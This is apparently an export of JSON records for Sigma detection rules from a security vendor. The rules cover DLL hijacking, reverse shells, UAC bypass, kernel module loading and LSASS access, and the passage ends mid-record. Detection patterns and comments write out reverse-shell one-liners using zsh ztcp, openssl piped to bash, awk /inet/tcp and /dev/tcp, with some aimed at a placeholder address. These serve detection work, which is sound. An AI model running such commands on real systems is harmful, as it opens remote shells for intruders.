filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "04429fe5-8be4-4481-b930-acfc3c648434", + "rule_name": "DLL Hijacking via gpupdate.exe", + "rule_description": "Detects potential Windows DLL Hijacking via gpupdate.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0462a933-4c70-4baa-b836-58671ae8a94b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": 
false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.095664Z", + "creation_date": "2026-03-23T11:45:34.095666Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.095670Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux", + "https://www.revshells.com/", + "https://attack.mitre.org/techniques/T1059/004/", + "https://attack.mitre.org/techniques/T1559/" + ], + "name": "t1059_004_reverse_shell_command_line_macos.yml", + "content": "title: Reverse Shell Executed from Command-line\nid: 0462a933-4c70-4baa-b836-58671ae8a94b\ndescription: |\n Detects suspicious shell commands related to the execution of reverse shells.\n A reverse shell is a shell session that is initiated from a remote machine.\n Attackers often use reverse shells to bypass firewall restrictions.\n It is recommended to investigate the process that started the reverse shell, as well as any malcious actions the reverse could have taken.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://www.revshells.com/\n - https://attack.mitre.org/techniques/T1059/004/\n - https://attack.mitre.org/techniques/T1559/\ndate: 2024/05/15\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - attack.t1559\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.RemoteShell\nlogsource:\n category: process_creation\n 
product: macos\ndetection:\n selection_command:\n CommandLine|contains:\n - 'http://reverse-shell.sh/'\n - 'https://reverse-shell.sh/'\n - 'sh -i*>*/dev/tcp/*'\n - 'sh -i*>*/dev/udp/*'\n - 'exec *<>*/dev/tcp/*'\n - 'exec *<>*/dev/udp/*'\n - 'sh*0>*/dev/tcp/'\n - 'sh*0>*/dev/udp/'\n - 'sh -i <&3 >&3 2>&3'\n # openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect :\n - 's_client*-connect*:*|*sh*|*s_client*-connect*:*'\n # zsh -c 'zmodload zsh/net/tcp && ztcp 10.10.10.10 9001 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'\n - 'zmodload zsh/net/tcp * ztcp'\n - 'sh*>*/dev/tcp/'\n - 'sh*>*/dev/udp/'\n\n # awk 'BEGIN {s = \"/inet/tcp/0//\"; while(42) { do{ printf \"shell>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null\n selection_awk_protocol:\n CommandLine|contains:\n - '/inet/tcp/'\n - '/inet/udp/'\n selection_awk_command:\n CommandLine|contains|all:\n - 'BEGIN '\n - 'printf'\n - 'getline '\n - 'close('\n\n exclusion_localhost:\n CommandLine|contains:\n - '/dev/tcp/127.0.0.1/'\n - '/dev/udp/127.0.0.1/'\n\n condition: selection_command or (all of selection_awk_*) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0462a933-4c70-4baa-b836-58671ae8a94b", + "rule_name": "Reverse Shell Executed from Command-line", + "rule_description": "Detects suspicious shell commands related to the execution of reverse shells.\nA reverse shell is a shell session that is initiated from a remote machine.\nAttackers often use reverse shells to bypass firewall restrictions.\nIt is recommended to investigate the process that started the reverse shell, as well as any malcious actions the reverse could have taken.\n", + "rule_creation_date": "2024-05-15", + "rule_modified_date": "2025-04-14", + "rule_os": "macos", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution" + ], 
+ "rule_technique_tags": [ + "attack.t1059.004", + "attack.t1559" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0486b170-5b3c-4234-8610-a8881dfb1dbf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.081276Z", + "creation_date": "2026-03-23T11:45:34.081278Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.081282Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/xforcered/WFH", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_taskkill.yml", + "content": "title: DLL Hijacking via taskkill.exe\nid: 0486b170-5b3c-4234-8610-a8881dfb1dbf\ndescription: |\n Detects potential Windows DLL Hijacking via taskkill.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 
or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'taskkill.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbghelp.dll'\n - '\\framedynos.dll'\n - '\\mpr.dll'\n - '\\netutils.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n - '\\version.dll'\n - '\\wbemprox.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0486b170-5b3c-4234-8610-a8881dfb1dbf", + "rule_name": "DLL Hijacking via taskkill.exe", + "rule_description": "Detects potential Windows DLL Hijacking via taskkill.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside 
each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "04b80cc3-4931-4733-9085-38663dfb2e0c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.077465Z", + "creation_date": "2026-03-23T11:45:34.077467Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.077472Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/" + ], + "name": "t1548_002_post_uac_bypass_fodhelper.yml", + 
"content": "title: UAC Bypass Executed via fodhelper\nid: 04b80cc3-4931-4733-9085-38663dfb2e0c\ndescription: |\n Detects a process being spawned by fodhelper.exe.\n Fodhelper.exe has autoelevation capabilities and an integrity level of High.\n This is the result of an attack against a ShellExecuteW(\"ms-settings:optionalfeatures\") call inside fodhelper.\n Attackers may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n As such, it is recommended to look for other alerts related to ms-settings.\nreferences:\n - https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/\ndate: 2020/10/12\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\fodhelper.exe'\n exclusion_werfault:\n Image:\n - '?:\\windows\\system32\\werfault.exe'\n - '?:\\windows\\syswow64\\werfault.exe'\n # c:\\windows\\system32\\werfault.exe -u -p 11444 -s 704\n CommandLine|contains: ' -u -p '\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "04b80cc3-4931-4733-9085-38663dfb2e0c", + "rule_name": "UAC Bypass Executed via fodhelper", + "rule_description": "Detects a process being spawned by fodhelper.exe.\nFodhelper.exe has autoelevation capabilities and an integrity level of High.\nThis is the result of an attack against a ShellExecuteW(\"ms-settings:optionalfeatures\") call inside fodhelper.\nAttackers may 
bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nAs such, it is recommended to look for other alerts related to ms-settings.\n", + "rule_creation_date": "2020-10-12", + "rule_modified_date": "2025-02-03", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1548.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "04fc1ab5-7c16-4e89-9c17-8b4dc21c0d44", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.627504Z", + "creation_date": "2026-03-23T11:45:34.627506Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.627510Z", + "rule_level": "medium", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1564/", + "https://attack.mitre.org/techniques/T1036/" + ], + "name": 
"t1564_recycle_bin.yml", + "content": "title: Process Executed from Recycle Bin Folder\nid: 04fc1ab5-7c16-4e89-9c17-8b4dc21c0d44\ndescription: |\n Detects an execution from Recycle Bin folder.\n This folder is an uncommon directory for binaries to execute from and is often abused by attackers.\n It is recommended to determine if the executed binary is legitimate as well as to investigate the context of this execution.\nreferences:\n - https://attack.mitre.org/techniques/T1564/\n - https://attack.mitre.org/techniques/T1036/\ndate: 2021/07/08\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564\n - attack.t1036\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|startswith: '?:\\\\?Recycle.Bin\\S-1-5-21-*\\$R'\n\n # Teams updater doing weird things\n exclusion_teams:\n Signed: 'true'\n Signature: 'Microsoft Corporation'\n\n exclusion_managesoft:\n ParentImage: '?:\\Program Files (x86)\\ManageSoft\\Tracker\\ndtrack.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "04fc1ab5-7c16-4e89-9c17-8b4dc21c0d44", + "rule_name": "Process Executed from Recycle Bin Folder", + "rule_description": "Detects an execution from Recycle Bin folder.\nThis folder is an uncommon directory for binaries to execute from and is often abused by attackers.\nIt is recommended to determine if the executed binary is legitimate as well as to investigate the context of this execution.\n", + "rule_creation_date": "2021-07-08", + "rule_modified_date": "2026-02-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1036", + "attack.t1564" + ], + "warnings": null, + "errors": null, + 
"declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "050e879b-c3c6-421d-8fc1-c03917f620d2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.596684Z", + "creation_date": "2026-03-23T11:45:34.596687Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.596695Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://linux.die.net/man/8/insmod", + "https://man7.org/linux/man-pages/man8/kmod.8.html", + "https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1547.006/T1547.006.md", + "https://attack.mitre.org/techniques/T1547/006/", + "https://attack.mitre.org/techniques/T1014/" + ], + "name": "t1547_006_kernel_module_load_insmod.yml", + "content": "title: Kernel Module Loaded via Insmod\nid: 050e879b-c3c6-421d-8fc1-c03917f620d2\ndescription: |\n Detects the execution of insmod to load a kernel module manually.\n Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\n They extend the functionality of the kernel without the need to reboot the system.\n For example, one type of module is the 
device driver, which allows the kernel to access hardware connected to the system.\n Adversaries may modify the kernel to automatically execute programs on system boot.\n It is recommended to analyze the context around the usage of insmod as well as to analyze the loaded module to look for malicious content or actions.\nreferences:\n - https://linux.die.net/man/8/insmod\n - https://man7.org/linux/man-pages/man8/kmod.8.html\n - https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1547.006/T1547.006.md\n - https://attack.mitre.org/techniques/T1547/006/\n - https://attack.mitre.org/techniques/T1014/\ndate: 2023/12/15\nmodified: 2025/11/17\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1547.006\n - attack.defense_evasion\n - attack.t1014\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Rootkit.Generic\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n # Commands seen in malware:\n # insmod /root/my_malicious_malware.ko\n # insmod -- /root/my_malicious_malware.ko\n selection:\n Image|endswith: '/kmod'\n CommandLine|contains: 'insmod '\n\n # help and version\n exclusion_options_args:\n CommandLine|contains:\n - ' -h'\n - ' -V'\n - ' --help'\n - ' --version'\n\n exclusion_trendmicro:\n CommandLine:\n - 'insmod /opt/ds_agent/*/*.ko'\n - 'insmod /opt/TrendMicro/vls_agent/*/*.ko'\n\n # exclusion_package_manager:\n # TODO: Ancestors\n # # Yum\n # Ancestors|startswith: '/usr/bin/bash|/usr/bin/bash|/usr/libexec/platform-python*|/usr/libexec/platform-python*|'\n\n exclusion_kpatch:\n CommandLine:\n - 'insmod /var/lib/kpatch/*/livepatch-*.ko'\n - 'insmod /var/lib/kpatch/*/kpatch-*.ko'\n\n exclusion_symantec:\n CommandLine: '/sbin/insmod /opt/Symantec/autoprotect/.symevrm-custom-*.ko'\n\n exclusion_veeam:\n ProcessGrandparentImage: 
'/usr/sbin/veeamworker'\n\n exclusion_commvault:\n - ProcessCommandLine: 'insmod /lib/modules/*/kernel/drivers/*.ko'\n ProcessParentImage: '/opt/commvault/ksh'\n - ProcessGrandparentCommandLine: '/bin/bash /opt/commvault/Base/linux_drv.sh -a /opt/commvault/Base cvblk'\n\n exclusion_quadstorvtl:\n ProcessParentCommandLine: '/bin/bash /quadstorvtl/etc/quadstorvtl.init start'\n\n exclusion_yum_update:\n ProcessGrandparentCommandLine|startswith: '/usr/bin/sh /bin/kernel-install '\n\n exclusion_rpm:\n ProcessAncestors|contains: '|/usr/bin/rpm|'\n\n exclusion_veritas:\n ProcessCommandLine|startswith:\n - 'insmod /etc/vx/kernel/'\n - 'insmod /opt/VRTSgab/modules/'\n - 'insmod /opt/VRTSamf/modules/'\n - 'insmod /opt/VRTSvxfen/modules/'\n\n # https://github.com/quic/quic-usb-drivers/tree/master\n exclusion_quic:\n - ProcessParentCommandLine: '/bin/bash ./QcDevDriver.sh install'\n - ProcessCurrentDirectory: '/opt/QTI/QUD/BuildPackage/'\n\n exclusion_intel:\n ProcessCurrentDirectory: '/opt/intel/oneapi/vtune/20??.?/sepdk/src/'\n\n exclusion_aws:\n ProcessCommandLine|contains: 'aws-replication-driver.ko'\n ProcessAncestors|contains: '/aws-replication-installer-init|'\n\n exclusion_checkpoint:\n ProcessAncestors|contains: '|/var/lib/checkpoint/cpla/cpla|'\n\n exclusion_guardicore:\n - ProcessCommandLine: 'insmod /var/lib/guardicore/modules/*/gc-enforcement/*/gc-enforcement.ko'\n - ProcessAncestors|contains: '|/var/lib/guardicore/sbin/gc-agents-service|'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "050e879b-c3c6-421d-8fc1-c03917f620d2", + "rule_name": "Kernel Module Loaded via Insmod", + "rule_description": "Detects the execution of insmod to load a kernel module manually.\nLoadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\nThey extend the functionality of the kernel without 
the need to reboot the system.\nFor example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.\nAdversaries may modify the kernel to automatically execute programs on system boot.\nIt is recommended to analyze the context around the usage of insmod as well as to analyze the loaded module to look for malicious content or actions.\n", + "rule_creation_date": "2023-12-15", + "rule_modified_date": "2025-11-17", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1014", + "attack.t1547.006" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "051bcdc2-56be-49af-bd6f-1fbac403ab5b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "weak", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.612386Z", + "creation_date": "2026-03-23T11:45:34.612389Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.612397Z", + "rule_level": "medium", + "rule_confidence": "weak", + "rule_confidence_override": null, + "references": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md#atomic-test-2---at---schedule-a-job", + "https://attack.mitre.org/techniques/T1053/002/" + ], + "name": "t1053_002_scheduled_job_at.yml", + "content": "title: Job Creation Scheduled via at\nid: 051bcdc2-56be-49af-bd6f-1fbac403ab5b\ndescription: |\n Detects a scheduled job creation using the 'at' utility.\n Contrary to the 'crontab' command which schedules repetitive commands, the 'at' command schedules tasks that execute once.\n The new job can be found in the /var/spool/cron/atjobs directory.\n Adversaries may abuse the 'at' utility to perform task scheduling for initial or recurring execution of malicious code.\n It is recommended to investigate the process using the utility as well as the scheduled job itself to look for malicious content or actions.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md#atomic-test-2---at---schedule-a-job\n - https://attack.mitre.org/techniques/T1053/002/\ndate: 2022/12/26\nmodified: 2025/07/29\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.002\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.At\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith:\n - '/at'\n - '/batch'\n\n exclusion_not_create:\n CommandLine|contains:\n - ' -l' # lists the user's pending jobs\n - ' -r' # deletes jobs\n - ' -d' # deletes jobs\n\n exclusion_now:\n CommandLine: 'at now'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "051bcdc2-56be-49af-bd6f-1fbac403ab5b", + "rule_name": "Job Creation Scheduled via at", + "rule_description": "Detects a scheduled job creation using the 'at' 
utility.\nContrary to the 'crontab' command which schedules repetitive commands, the 'at' command schedules tasks that execute once.\nThe new job can be found in the /var/spool/cron/atjobs directory.\nAdversaries may abuse the 'at' utility to perform task scheduling for initial or recurring execution of malicious code.\nIt is recommended to investigate the process using the utility as well as the scheduled job itself to look for malicious content or actions.\n", + "rule_creation_date": "2022-12-26", + "rule_modified_date": "2025-07-29", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1053.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "053fc596-ebe0-4ab6-9d82-691fec399375", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:35.295481Z", + "creation_date": "2026-03-23T11:45:35.295485Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:35.295491Z", + "rule_level": "medium", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + 
"https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/shadowpad-new-activity-from-the-winnti-group/", + "https://attack.mitre.org/techniques/T1003/001/" + ], + "name": "t1003_001_cleared_process_info_open_lsass.yml", + "content": "title: LSASS Accessed by Process Without PE Metadata Information\nid: 053fc596-ebe0-4ab6-9d82-691fec399375\ndescription: |\n Detects the suspicious open of lsass.exe by a process without PE metadata information (original name and internal name).\n This can be indicative of an attempt to dump LSASS' memory for privilege escalation purposes.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n It is recommended to analyze the source process for malicious content, to check its legitimacy and origin and to start memory forensics to determine stolen credentials.\nreferences:\n - https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/shadowpad-new-activity-from-the-winnti-group/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2021/06/07\nmodified: 2026/02/16\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccessStr|contains: \"PROCESS_VM_READ\"\n ProcessOriginalFileName: ''\n ProcessInternalName: ''\n ProcessLegalCopyright: '' # too many FP with only OriginalFileame and InternalName not set. 
